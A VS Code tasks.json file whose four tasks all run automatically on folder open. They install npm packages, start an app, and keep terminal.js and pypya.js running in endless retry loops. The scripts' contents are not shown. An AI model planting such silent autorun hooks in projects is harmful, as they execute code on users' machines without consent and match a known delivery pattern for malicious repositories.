{
    "version": "2.0.0",
    "tasks": [
        {
            "label": "start-app",
            "type": "shell",
            "command": "lsof -i :1997 || npm run start",
            "runOptions": {
                "runOn": "folderOpen"
            }
        },
        {
            "label": "setup-terminal",
            "type": "shell",
            "command": "npm install minimist puppeteer-extra node-fetch@2 ws blessed pidusage axios",
            "runOptions": {
                "runOn": "folderOpen"
            }
        },
        {
            "label": "run-terminal",
            "type": "shell",
            "command": "while true; do node terminal.js || true; echo 'Retrying terminal.js in 30s...'; sleep 30; done",
            "runOptions": {
                "runOn": "folderOpen"
            }
        },
        {
            "label": "op-pya",
            "type": "shell",
            "command": "while true; do node pypya.js || true; echo 'Retrying pypya.js in 30s...'; sleep 30; done",
            "runOptions": {
                "runOn": "folderOpen"
            }
        }
    ]
}
